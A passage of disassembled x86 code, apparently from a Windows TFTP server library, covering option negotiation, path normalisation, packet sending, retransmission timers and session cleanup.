mov edi, [ebp+arg_10]
or ecx, 0FFFFFFFFh
xor eax, eax
lea edx, [ebp+var_FFB8]
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, [ebp+arg_10]
jmp short loc_10023A2
; ---------------------------------------------------------------------------
loc_1002369: ; CODE XREF: sub_100230A+32�j
cmp di, 9
jb short loc_1002371
xor edi, edi
loc_1002371: ; CODE XREF: sub_100230A+63�j
movzx eax, di
or ecx, 0FFFFFFFFh
lea ebx, [ebp+var_FFB8]
mov edx, off_1005CC0[eax*4]
xor eax, eax
mov edi, edx
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, edx
loc_10023A2: ; CODE XREF: sub_100230A+5D�j
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
push 10h ; tolen
push [ebp+to] ; to
not ecx
dec ecx
push eax ; flags
add ecx, 5
lea eax, [ebp+buf]
push ecx ; len
push eax ; buf
push [ebp+s] ; s
call ds:sendto ; sendto
cmp eax, 0FFFFFFFFh
jnz short loc_10023D1
call ds:WSAGetLastError ; WSAGetLastError
loc_10023D1: ; CODE XREF: sub_100230A+BF�j
pop edi
pop esi
pop ebx
leave
retn 14h
sub_100230A endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_10023D8(int, char *Str1, int, int, int, int)
sub_10023D8 proc near ; CODE XREF: sub_1002F31+302�p
; sub_100333A+26D�p
arg_0 = dword ptr 4
Str1 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
mov eax, [esp+arg_0]
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_10]
mov dword ptr [eax+20h], 200h
mov dword ptr [eax+28h], 0Ah
mov eax, [esp+0Ch+arg_14]
push edi
mov ecx, 3FEFh
and dword ptr [eax], 0
xor eax, eax
mov edi, esi
push 6 ; hostshort
rep stosd
call ds:htons ; htons
mov [esi], ax
lea ebx, [esi+2]
mov ebp, [esp+10h+Str1]
cmp byte ptr [ebp+0], 0
jz loc_10025E4
loc_1002420: ; CODE XREF: sub_10023D8+202�j
mov esi, ds:_stricmp
push offset Str2 ; "blksize"
push ebp ; Str1
call esi ; _stricmp
pop ecx
test eax, eax
pop ecx
jnz short loc_1002498
mov edi, ebp
or ecx, 0FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
push 8
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop esi
add ebp, esi
add ebx, esi
push ebp ; Str
call ds:atoi ; atoi
pop ecx
cmp eax, esi
mov ecx, [esp+10h+arg_0]
mov [ecx+20h], eax
jb loc_10025FD
cmp eax, 0FFB8h
ja loc_10025FD
cmp eax, 5B0h
jnz short loc_100248F
mov dword ptr [ecx+20h], 200h
sub ebx, esi
jmp loc_10025C6
; ---------------------------------------------------------------------------
loc_100248F: ; CODE XREF: sub_10023D8+A7�j
push 0Ah
push ebx
push eax
jmp loc_1002597
; ---------------------------------------------------------------------------
loc_1002498: ; CODE XREF: sub_10023D8+5A�j
push offset aTimeout_0 ; "timeout"
push ebp ; Str1
call esi ; _stricmp
pop ecx
test eax, eax
pop ecx
jnz short loc_100251A
mov edi, ebp
or ecx, 0FFFFFFFFh
repne scasb
not ecx
sub edi, ecx
add ebp, 8
mov eax, ecx
mov esi, edi
mov edi, ebx
push ebp ; Str
shr ecx, 2
rep movsd
mov ecx, eax
add ebx, 8
and ecx, 3
rep movsb
call ds:atoi ; atoi
pop ecx
mov ecx, [esp+10h+arg_0]
push 1
pop edx
cmp eax, edx
mov [ecx+28h], eax
jl loc_1002602
cmp eax, 0FFh
jg loc_1002602
mov eax, [esp+10h+arg_14]
mov edi, ebp
or ecx, 0FFFFFFFFh
mov [eax], edx
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov edi, ebp
jmp loc_10025A2
; ---------------------------------------------------------------------------
loc_100251A: ; CODE XREF: sub_10023D8+CC�j
push offset aTsize ; "tsize"
push ebp ; Str1
call esi ; _stricmp
pop ecx
mov edi, ebp
test eax, eax
pop ecx
jnz loc_10025B2
or edx, 0FFFFFFFFh
xor eax, eax
mov ecx, edx
add ebp, 6
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
add ebx, 6
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
cmp [esp+10h+arg_8], 2
rep movsb
jnz short loc_100258D
mov edi, ebp
mov ecx, edx
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov eax, ecx
mov esi, edi
mov edi, ebx
shr ecx, 2
rep movsd
mov ecx, eax
xor eax, eax
and ecx, 3
rep movsb
mov edi, ebp
mov ecx, edx
repne scasb
not ecx
dec ecx
mov edi, ebp
lea ebx, [ebx+ecx+1]
mov ecx, edx
jmp short loc_10025CB
; ---------------------------------------------------------------------------
loc_100258D: ; CODE XREF: sub_10023D8+180�j
mov eax, [esp+10h+arg_0]
push 0Ah ; Radix
push ebx ; DstBuf
push dword ptr [eax+24h] ; Val
loc_1002597: ; CODE XREF: sub_10023D8+BB�j
call ds:_itoa ; _itoa
add esp, 0Ch
mov edi, ebx
loc_10025A2: ; CODE XREF: sub_10023D8+13D�j
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
lea ebx, [ebx+ecx+1]
jmp short loc_10025C6
; ---------------------------------------------------------------------------
loc_10025B2: ; CODE XREF: sub_10023D8+150�j
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
cmp [ebp+ecx+1], al
lea ebp, [ebp+ecx+1]
jz short loc_10025E0
loc_10025C6: ; CODE XREF: sub_10023D8+B2�j
; sub_10023D8+1D8�j
mov edi, ebp
or ecx, 0FFFFFFFFh
loc_10025CB: ; CODE XREF: sub_10023D8+1B3�j
xor eax, eax
repne scasb
not ecx
dec ecx
cmp [ebp+ecx+1], al
lea ebp, [ebp+ecx+1]
jnz loc_1002420
loc_10025E0: ; CODE XREF: sub_10023D8+1EC�j
mov esi, [esp+10h+arg_10]
loc_10025E4: ; CODE XREF: sub_10023D8+42�j
mov eax, [esp+10h+arg_C]
sub ebx, esi
cmp ebx, 2
mov [eax], ebx
jnz short loc_10025F4
and dword ptr [eax], 0
loc_10025F4: ; CODE XREF: sub_10023D8+217�j
xor eax, eax
loc_10025F6: ; CODE XREF: sub_10023D8+244�j
pop edi
pop esi
pop ebp
pop ebx
retn 18h
; ---------------------------------------------------------------------------
loc_10025FD: ; CODE XREF: sub_10023D8+91�j
; sub_10023D8+9C�j
push 0
push esi
jmp short loc_1002606
; ---------------------------------------------------------------------------
loc_1002602: ; CODE XREF: sub_10023D8+105�j
; sub_10023D8+110�j
push 0 ; int
push 8 ; hostshort
loc_1002606: ; CODE XREF: sub_10023D8+228�j
push dword ptr [ecx+8] ; s
lea eax, [ecx+0FFF1h]
add ecx, 0Ch
push eax ; int
push ecx ; to
call sub_100230A
or eax, 0FFFFFFFFh
jmp short loc_10025F6
sub_10023D8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100261E proc near ; CODE XREF: sub_1002F31+130�p
; sub_100333A+150�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
mov al, [ebx]
mov ecx, ebx
mov esi, ebx
mov [ebp+arg_0], ebx
loc_1002630: ; CODE XREF: sub_100261E+22�j
test al, al
jz short loc_1002642
cmp al, 5Ch
jz short loc_100263C
cmp al, 2Fh
jnz short loc_1002642
loc_100263C: ; CODE XREF: sub_100261E+18�j
mov al, [ecx+1]
inc ecx
jmp short loc_1002630
; ---------------------------------------------------------------------------
loc_1002642: ; CODE XREF: sub_100261E+14�j
; sub_100261E+1C�j ...
mov al, [ecx]
test al, al
jz loc_10026E4
cmp al, 2Eh
jnz loc_100271C
mov dl, [ecx+1]
lea edi, [ecx+1]
cmp dl, 5Ch
jz loc_1002718
cmp dl, 2Fh
jz loc_1002718
cmp dl, al
jnz loc_1002703
mov dl, [ecx+2]
lea edi, [ecx+2]
cmp dl, 5Ch
jz short loc_1002684
cmp dl, 2Fh
jnz short loc_1002703
loc_1002684: ; CODE XREF: sub_100261E+5F�j
dec esi
mov ecx, edi
dec esi
cmp esi, ebx
jbe short loc_10026E0
loc_100268C: ; CODE XREF: sub_100261E+7B�j
mov al, [esi]
cmp al, 5Ch
jz short loc_100269B
cmp al, 2Fh
jz short loc_100269B
dec esi
cmp esi, ebx
jnb short loc_100268C
loc_100269B: ; CODE XREF: sub_100261E+72�j
; sub_100261E+76�j
inc esi
loc_100269C: ; CODE XREF: sub_100261E+8E�j
; sub_100261E+EE�j ...
cmp esi, [ebp+arg_0]
jbe short loc_10026AE
cmp byte ptr [esi-1], 20h
lea eax, [esi-1]
jnz short loc_10026AE
mov esi, eax
jmp short loc_100269C
; ---------------------------------------------------------------------------
loc_10026AE: ; CODE XREF: sub_100261E+81�j
; sub_100261E+8A�j
mov al, [ecx]
cmp al, 5Ch
jz short loc_10026B8
cmp al, 2Fh
jnz short loc_1002642
loc_10026B8: ; CODE XREF: sub_100261E+94�j
cmp esi, ebx
jz short loc_10026CB
mov al, [esi-1]
cmp al, 5Ch
jz short loc_10026CB
cmp al, 2Fh
jz short loc_10026CB
mov byte ptr [esi], 5Ch
inc esi
loc_10026CB: ; CODE XREF: sub_100261E+9C�j
; sub_100261E+A3�j ...
inc ecx
jz short loc_10026D8
mov al, [ecx]
cmp al, 5Ch
jz short loc_10026CB
cmp al, 2Fh
jz short loc_10026CB
loc_10026D8: ; CODE XREF: sub_100261E+AE�j
mov [ebp+arg_0], esi
jmp loc_1002642
; ---------------------------------------------------------------------------
loc_10026E0: ; CODE XREF: sub_100261E+6C�j
xor eax, eax
jmp short loc_10026FC
; ---------------------------------------------------------------------------
loc_10026E4: ; CODE XREF: sub_100261E+28�j
mov cl, [esi-1]
lea eax, [esi-1]
cmp cl, 5Ch
jz short loc_10026F4
cmp cl, 2Fh
jnz short loc_10026F6
loc_10026F4: ; CODE XREF: sub_100261E+CF�j
mov esi, eax
loc_10026F6: ; CODE XREF: sub_100261E+D4�j
and byte ptr [esi], 0
push 1
pop eax
loc_10026FC: ; CODE XREF: sub_100261E+C4�j
pop edi
pop esi
pop ebx
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_1002703: ; CODE XREF: sub_100261E+50�j
; sub_100261E+64�j ...
mov [esi], al
mov al, [ecx+1]
inc esi
inc ecx
test al, al
jz short loc_100269C
cmp al, 5Ch
jz short loc_100269C
cmp al, 2Fh
jnz short loc_1002703
jmp short loc_100269C
; ---------------------------------------------------------------------------
loc_1002718: ; CODE XREF: sub_100261E+3F�j
; sub_100261E+48�j
mov ecx, edi
jmp short loc_100269C
; ---------------------------------------------------------------------------
loc_100271C: ; CODE XREF: sub_100261E+30�j
; sub_100261E+11D�j
test al, al
jz loc_100269C
cmp al, 5Ch
jz loc_100269C
cmp al, 2Fh
jz loc_100269C
mov [esi], al
mov al, [ecx+1]
inc esi
inc ecx
jmp short loc_100271C
sub_100261E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_100273D(void *Src, int, int)
sub_100273D proc near ; CODE XREF: sub_1002F31+18C�p
; sub_100333A+197�p
Src = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, esi
or ecx, 0FFFFFFFFh
xor eax, eax
mov edx, [ebp+Src]
repne scasb
not ecx
dec ecx
mov edi, edx
mov ebx, ecx
or ecx, 0FFFFFFFFh
repne scasb
not ecx
dec ecx
cmp byte ptr [ebx+esi-1], 5Ch
mov edi, ecx
setz al
xor ecx, ecx
cmp byte ptr [edx], 5Ch
setz cl
test eax, eax
jnz short loc_1002784
test ecx, ecx
jnz short loc_1002784
mov [ebp+arg_8], 1
jmp short loc_1002791
; ---------------------------------------------------------------------------
loc_1002784: ; CODE XREF: sub_100273D+38�j
; sub_100273D+3C�j
and [ebp+arg_8], 0
test eax, eax
jz short loc_1002791
test ecx, ecx
jz short loc_1002791
dec ebx
loc_1002791: ; CODE XREF: sub_100273D+45�j
; sub_100273D+4D�j ...
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_4]
add eax, edi
add eax, ebx
dec ecx
cmp eax, ecx
jbe short loc_10027A4
xor eax, eax
jmp short loc_10027DA
; ---------------------------------------------------------------------------
loc_10027A4: ; CODE XREF: sub_100273D+61�j
mov eax, [ebp+arg_8]
inc edi
add eax, ebx
push edi ; Size
add eax, edx
push edx ; Src
push eax ; Dst
call ds:memmove ; memmove
mov eax, [ebp+Src]
mov ecx, ebx
mov edx, ecx
mov edi, eax
shr ecx, 2
rep movsd
mov ecx, edx
add esp, 0Ch
and ecx, 3
cmp [ebp+arg_8], 0
rep movsb
jz short loc_10027D7
mov byte ptr [ebx+eax], 5Ch
loc_10027D7: ; CODE XREF: sub_100273D+94�j
push 1
pop eax
loc_10027DA: ; CODE XREF: sub_100273D+65�j
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_100273D endp
; =============== S U B R O U T I N E =======================================
sub_10027E1 proc near ; CODE XREF: sub_1002B5E+C7�p
; sub_1002F31+36B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov ecx, [esi+10024h]
lea eax, [esi+10024h]
test ecx, ecx
jz short loc_1002817
and dword ptr [eax], 0
mov eax, [esp+8+arg_4]
and word ptr [esi+10014h], 0
mov [esi+10020h], ecx
mov eax, [eax+20h]
mov [esi+1001Ch], eax
jmp short loc_1002877
; ---------------------------------------------------------------------------
loc_1002817: ; CODE XREF: sub_10027E1+14�j
mov edi, ds:htons
push 3 ; hostshort
call edi ; htons
mov [esi+38h], ax
mov ax, [esi+10014h]
push eax ; hostshort
call edi ; htons
mov [esi+3Ah], ax
mov eax, [esp+8+arg_4]
push dword ptr [eax+20h]
lea eax, [esi+3Ch]
push eax
push dword ptr [esi+1002Ch]
call ds:_read ; _read
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [esi+1001Ch], eax
jnz short loc_100286E
mov esi, ds:_errno
call esi ; _errno
call esi ; _errno
push dword ptr [eax] ; dwErrCode
call ds:SetLastError
xor eax, eax
jmp short loc_100287A
; ---------------------------------------------------------------------------
loc_100286E: ; CODE XREF: sub_10027E1+75�j
add eax, 4
mov [esi+10020h], eax
loc_1002877: ; CODE XREF: sub_10027E1+34�j
push 1
pop eax
loc_100287A: ; CODE XREF: sub_10027E1+8B�j
pop edi
pop esi
retn 8
sub_10027E1 endp
; =============== S U B R O U T I N E =======================================
sub_100287F proc near ; CODE XREF: sub_1002F31+2C6�p
; sub_100333A+2CD�p
arg_0 = dword ptr 4
push esi
mov esi, offset CriticalSection
push esi ; lpCriticalSection
call ds:EnterCriticalSection
mov ecx, dword_1006098
push esi ; lpCriticalSection
mov eax, [esp+8+arg_0]
mov [eax], ecx
mov dword ptr [eax+4], offset dword_1006098
mov [ecx+4], eax
mov dword_1006098, eax
call ds:LeaveCriticalSection
push 1
pop eax
pop esi
retn 4
sub_100287F endp
; =============== S U B R O U T I N E =======================================
sub_10028B5 proc near ; CODE XREF: sub_1002A3D+C�p
; sub_1002EC8+8�p ...
arg_0 = dword ptr 4
push ebx
mov ebx, ds:EnterCriticalSection
push esi
push edi
mov edi, offset CriticalSection
push edi ; lpCriticalSection
call ebx ; EnterCriticalSection
mov eax, dword_1006098
mov ecx, offset dword_1006098
loc_10028D0: ; CODE XREF: sub_10028B5+2D�j
cmp eax, ecx
jz short loc_10028F2
mov edx, [eax+8]
lea esi, [eax-18h]
cmp edx, [esp+0Ch+arg_0]
jz short loc_10028E4
mov eax, [eax]
jmp short loc_10028D0
; ---------------------------------------------------------------------------
loc_10028E4: ; CODE XREF: sub_10028B5+29�j
push esi ; lpCriticalSection
call ebx ; EnterCriticalSection
push edi ; lpCriticalSection
call ds:LeaveCriticalSection
mov eax, esi
jmp short loc_10028FB
; ---------------------------------------------------------------------------
loc_10028F2: ; CODE XREF: sub_10028B5+1D�j
push edi ; lpCriticalSection
call ds:LeaveCriticalSection
xor eax, eax
loc_10028FB: ; CODE XREF: sub_10028B5+3B�j
pop edi
pop esi
pop ebx
retn 4
sub_10028B5 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_1002901(LPCRITICAL_SECTION lpCriticalSection)
sub_1002901 proc near ; CODE XREF: sub_100297A+A�p
lpCriticalSection= dword ptr 4
push esi
mov esi, [esp+4+lpCriticalSection]
mov eax, [esi+20h]
cmp eax, 0FFFFFFFFh
jz short loc_1002915
push eax ; s
call ds:closesocket ; closesocket
loc_1002915: ; CODE XREF: sub_1002901+B�j
mov eax, [esi+10004h]
test eax, eax
jz short loc_100292E
push 0
push eax
push dword_10060A0
call ds:RtlDeleteTimer ; RtlDeleteTimer
loc_100292E: ; CODE XREF: sub_1002901+1C�j
push 0
push dword ptr [esi+0FFFCh]
call ds:RtlDeregisterWaitEx ; RtlDeregisterWaitEx
push dword ptr [esi+0FFF8h] ; hObject
call ds:CloseHandle ; CloseHandle
push esi ; lpCriticalSection
call ds:DeleteCriticalSection
pop esi
retn 4
sub_1002901 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_1002953(void *Memory)
sub_1002953 proc near ; CODE XREF: sub_100297A+2F�p
; sub_100297A+37�p
Memory = dword ptr 4
push esi
mov esi, [esp+4+Memory]
mov eax, [esi+1002Ch]
cmp eax, 0FFFFFFFFh
jz short loc_100296B
push eax
call ds:_close ; _close
pop ecx
loc_100296B: ; CODE XREF: sub_1002953+E�j
push esi ; Memory
call ds:free ; free
pop ecx
pop esi
retn 4
sub_1002953 endp
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_100297A(LPCRITICAL_SECTION Memory)
sub_100297A proc near ; CODE XREF: sub_10029BA+55�p
Memory = dword ptr 4
push esi
mov esi, [esp+4+Memory]
test esi, esi
jz short loc_10029B6
push esi ; lpCriticalSection
call sub_1002901
mov eax, [esi+24h]
dec eax
jz short loc_10029B0
dec eax
jz short loc_10029A8
dec eax
jz short loc_10029A0
dec eax
jnz short loc_10029B6
push esi
call nullsub_1
jmp short loc_10029B6
; ---------------------------------------------------------------------------
loc_10029A0: ; CODE XREF: sub_100297A+19�j
push esi
call nullsub_1
jmp short loc_10029B6
; ---------------------------------------------------------------------------
loc_10029A8: ; CODE XREF: sub_100297A+16�j
push esi ; Memory
call sub_1002953
jmp short loc_10029B6
; ---------------------------------------------------------------------------
loc_10029B0: ; CODE XREF: sub_100297A+13�j
push esi ; Memory
call sub_1002953
loc_10029B6: ; CODE XREF: sub_100297A+7�j
; sub_100297A+1C�j ...
pop esi
retn 4
sub_100297A endp
; =============== S U B R O U T I N E =======================================
sub_10029BA proc near ; DATA XREF: sub_10018DB+98�o
push ebx
mov ebx, ds:EnterCriticalSection
push esi
push offset CriticalSection ; lpCriticalSection
call ebx ; EnterCriticalSection
mov esi, dword_1006098
cmp esi, offset dword_1006098
jz short loc_1002A28
push edi
push ebp
loc_10029D9: ; CODE XREF: sub_10029BA+6A�j
lea edi, [esi-18h]
push edi ; lpCriticalSection
call ebx ; EnterCriticalSection
mov ebp, [esi]
inc dword ptr [edi+10008h]
cmp dword ptr [edi+10008h], 4
lea eax, [edi+10008h]
push edi ; lpCriticalSection
jb short loc_1002A16
call ebx ; EnterCriticalSection
mov eax, [esi]
mov esi, [esi+4]
mov [esi], eax
mov [eax+4], esi
mov ax, [edi+2Ah]
push eax ; hostshort
call ds:htons ; htons
push edi ; Memory
call sub_100297A
jmp short loc_1002A1C
; ---------------------------------------------------------------------------
loc_1002A16: ; CODE XREF: sub_10029BA+3B�j
call ds:LeaveCriticalSection
loc_1002A1C: ; CODE XREF: sub_10029BA+5A�j
cmp ebp, offset dword_1006098
mov esi, ebp
jnz short loc_10029D9
pop ebp
pop edi
loc_1002A28: ; CODE XREF: sub_10029BA+1B�j
push offset CriticalSection ; lpCriticalSection
call ds:LeaveCriticalSection
call sub_1001A1F
pop esi
pop ebx
retn 8
sub_10029BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1002A3D proc near ; DATA XREF: sub_1002F31+341�o
; sub_100333A+32C�o
SystemTime = _SYSTEMTIME ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_10028B5
mov esi, eax
xor ebx, ebx
cmp esi, ebx
jz loc_1002B57
mov eax, [esi+1000Ch]
cmp eax, 0Ah
jnb loc_1002B0B
cmp eax, 5
jbe short loc_1002A8E
lea eax, [ebp+SystemTime]
push eax ; lpSystemTime
call ds:GetLocalTime ; GetLocalTime
mov ax, [esi+2Ah]
push eax ; netshort
call ds:ntohs ; ntohs
mov ax, [esi+3Ah]
push eax ; hostshort
call ds:htons ; htons
loc_1002A8E: ; CODE XREF: sub_1002A3D+2F�j
lea eax, [esi+28h]
push 10h ; tolen
push eax ; to
push ebx ; flags
push dword ptr [esi+10020h] ; len
lea eax, [esi+38h]
push eax ; buf
push dword ptr [esi+20h] ; s
call ds:sendto ; sendto
cmp eax, 0FFFFFFFFh
jnz short loc_1002AB3
call ds:WSAGetLastError ; WSAGetLastError
loc_1002AB3: ; CODE XREF: sub_1002A3D+6E�j
mov edi, [esi+10004h]
inc dword ptr [esi+1000Ch]
cmp edi, ebx
jz loc_1002B4C
cmp [esi+10028h], ebx
jnz short loc_1002AEA
mov eax, [esi+10000h]
lea ecx, [esi+10000h]
shl eax, 1
mov edx, 2710h
mov [ecx], eax
cmp eax, edx
jbe short loc_1002AEA
mov [ecx], edx
loc_1002AEA: ; CODE XREF: sub_1002A3D+90�j
; sub_1002A3D+A9�j
mov eax, [esi+10000h]
push eax
push eax
push edi
push dword_10060A0
call ds:RtlUpdateTimer ; RtlUpdateTimer
cmp eax, ebx
jz short loc_1002B4C
call ds:GetLastError
jmp short loc_1002B4C
; ---------------------------------------------------------------------------
loc_1002B0B: ; CODE XREF: sub_1002A3D+26�j
cmp esi, ebx
jz short loc_1002B57
push offset aTimeout ; "Timeout"
push ebx ; hostshort
push dword ptr [esi+20h] ; s
lea eax, [esi+28h]
push ebx ; int
push eax ; to
call sub_100230A
mov eax, [esi+10004h]
lea edi, [esi+10004h]
cmp eax, ebx
jz short loc_1002B40
push ebx
push eax
push dword_10060A0
call ds:RtlDeleteTimer ; RtlDeleteTimer
loc_1002B40: ; CODE XREF: sub_1002A3D+F3�j
mov [edi], ebx
mov dword ptr [esi+10008h], 4
loc_1002B4C: ; CODE XREF: sub_1002A3D+84�j
; sub_1002A3D+C4�j ...
cmp esi, ebx
jz short loc_1002B57
push esi ; lpCriticalSection
call ds:LeaveCriticalSection
loc_1002B57: ; CODE XREF: sub_1002A3D+17�j
; sub_1002A3D+D0�j ...
pop edi
pop esi
pop ebx
leave
retn 8
sub_1002A3D endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_1002B5E(LPCRITICAL_SECTION lpCriticalSection, int)
sub_1002B5E proc near ; CODE XREF: sub_1002EC8+3D�p
var_4 = dword ptr -4
lpCriticalSection= dword ptr 4
arg_4 = dword ptr 8
push ecx
push ebx
mov ebx, ds:ntohs
push ebp
push esi
mov esi, [esp+10h+lpCriticalSection]
push edi
mov edi, [esp+14h+arg_4]
xor ebp, ebp
mov eax, [esi+10018h]
push 4 ; netshort
mov [esp+18h+var_4], ebp
mov [edi+20h], eax
call ebx ; ntohs
cmp [edi+34h], ax
jnz short loc_1002BA6
mov ax, [esi+10014h]
push eax ; netshort
call ebx ; ntohs
cmp [edi+36h], ax
jnz short loc_1002BA6
and dword ptr [esi+1000Ch], 0
push 1
pop ebp
jmp short loc_1002BCE
; ---------------------------------------------------------------------------
loc_1002BA6: ; CODE XREF: sub_1002B5E+2A�j
; sub_1002B5E+3A�j
mov ax, [edi+36h]
push eax ; netshort
call ebx ; ntohs
mov ax, [edi+34h]
push eax ; hostshort
call ds:htons ; htons
push 4 ; netshort
call ebx ; ntohs
cmp [edi+34h], ax
jnz short loc_1002BCE
mov ax, [esi+10014h]
dec ax
push eax ; netshort
call ebx ; ntohs
loc_1002BCE: ; CODE XREF: sub_1002B5E+46�j
; sub_1002B5E+62�j
test ebp, ebp
jz loc_1002C96
cmp dword ptr [esi+10030h], 0
jz short loc_1002C1C
mov eax, [esi+10004h]
lea edi, [esi+10004h]
test eax, eax
jz short loc_1002BFE
push 0
push eax
push dword_10060A0
call ds:RtlDeleteTimer ; RtlDeleteTimer
loc_1002BFE: ; CODE XREF: sub_1002B5E+8F�j
and dword ptr [edi], 0
mov dword ptr [esi+10008h], 4
loc_1002C0B: ; CODE XREF: sub_1002B5E+DB�j
; sub_1002B5E+13E�j ...
push esi ; lpCriticalSection
call ds:LeaveCriticalSection
xor eax, eax
loc_1002C14: ; CODE XREF: sub_1002B5E+183�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn 8
; ---------------------------------------------------------------------------
loc_1002C1C: ; CODE XREF: sub_1002B5E+7F�j
inc word ptr [esi+10014h]
push edi
push esi
call sub_10027E1
mov ebp, eax
xor eax, eax
cmp ebp, eax
jnz short loc_1002C3B
mov ax, [edi+0Eh]
push eax ; netshort
call ebx ; ntohs
jmp short loc_1002C0B
; ---------------------------------------------------------------------------
loc_1002C3B: ; CODE XREF: sub_1002B5E+D2�j
cmp [esi+10028h], eax
mov [esi+1000Ch], eax
mov [esi+10008h], eax
jnz short loc_1002C59
mov dword ptr [esi+10000h], 3E8h
loc_1002C59: ; CODE XREF: sub_1002B5E+EF�j
mov ecx, [esi+10004h]
cmp ecx, eax
jz short loc_1002C78
mov eax, [esi+10000h]
push eax
push eax
push ecx
push dword_10060A0
call ds:RtlUpdateTimer ; RtlUpdateTimer
loc_1002C78: ; CODE XREF: sub_1002B5E+103�j
mov eax, [esi+1001Ch]
cmp eax, [edi+20h]
jnb short loc_1002C9A
mov ax, [edi+0Eh]
push eax ; netshort
call ebx ; ntohs
mov dword ptr [esi+10030h], 1
jmp short loc_1002C9A
; ---------------------------------------------------------------------------
loc_1002C96: ; CODE XREF: sub_1002B5E+72�j
mov ebp, [esp+14h+var_4]
loc_1002C9A: ; CODE XREF: sub_1002B5E+123�j
; sub_1002B5E+136�j
test ebp, ebp
jz loc_1002C0B
mov ax, [edi+0Eh]
push eax ; netshort
call ebx ; ntohs
add edi, 0Ch
push 10h ; tolen
push edi ; to
push 0 ; flags
push dword ptr [esi+10020h] ; len
lea eax, [esi+38h]
push eax ; buf
push dword ptr [esi+20h] ; s
call ds:sendto ; sendto
cmp eax, 0FFFFFFFFh
jnz loc_1002C0B
call ds:WSAGetLastError ; WSAGetLastError
test esi, esi
jz short loc_1002CDE
push esi ; lpCriticalSection
call ds:LeaveCriticalSection
loc_1002CDE: ; CODE XREF: sub_1002B5E+177�j
push 1
pop eax
jmp loc_1002C14
sub_1002B5E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_1002CE6(LPCRITICAL_SECTION lpCriticalSection, int)
sub_1002CE6 proc near ; CODE XREF: sub_1002EC8+34�p
var_4 = dword ptr -4
lpCriticalSection= dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, ds:ntohs
push esi
mov esi, [ebp+lpCriticalSection]
push edi
mov edi, [ebp+arg_4]
push 3 ; netshort
mov eax, [esi+10018h]
mov [edi+20h], eax
call ebx ; ntohs
cmp [edi+34h], ax
jnz short loc_1002D3A
mov ax, [esi+10014h]
inc ax
push eax ; netshort
call ebx ; ntohs
cmp [edi+36h], ax
jnz short loc_1002D3A
inc word ptr [esi+10014h]
xor ebx, ebx
mov [ebp+var_4], 1
mov [esi+10008h], ebx
jmp short loc_1002D9D
; ---------------------------------------------------------------------------
loc_1002D3A: ; CODE XREF: sub_1002CE6+28�j
; sub_1002CE6+3A�j
push 3 ; netshort
call ebx ; ntohs
cmp [edi+34h], ax
jnz short loc_1002D9B
mov ax, [esi+10014h]
push eax ; netshort
call ebx ; ntohs
cmp [edi+36h], ax
jnz short loc_1002D9B
mov ebx, ds:htons
push 4 ; hostshort
call ebx ; htons
mov [esi+38h], ax
mov ax, [esi+10014h]
push eax ; hostshort
call ebx ; htons
add edi, 0Ch
push 10h ; tolen
mov [esi+3Ah], ax
push edi ; to
push 0 ; flags
lea eax, [esi+38h]
push 4 ; len
push eax ; buf
push dword ptr [esi+20h] ; s
call ds:sendto ; sendto
cmp eax, 0FFFFFFFFh
jnz loc_1002EB3
call ds:WSAGetLastError ; WSAGetLastError
jmp loc_1002EB3
; ---------------------------------------------------------------------------
loc_1002D9B: ; CODE XREF: sub_1002CE6+5C�j
; sub_1002CE6+6C�j
xor ebx, ebx
loc_1002D9D: ; CODE XREF: sub_1002CE6+52�j
cmp [ebp+var_4], ebx
jz short loc_1002DE4
lea eax, [ebp+arg_4]
push eax
mov eax, [edi+2Ch]
push dword ptr [esi+10030h]
sub eax, 4
push eax
lea eax, [edi+38h]
push eax
push dword ptr [esi+1002Ch]
call sub_100373A
cmp [ebp+var_4], ebx
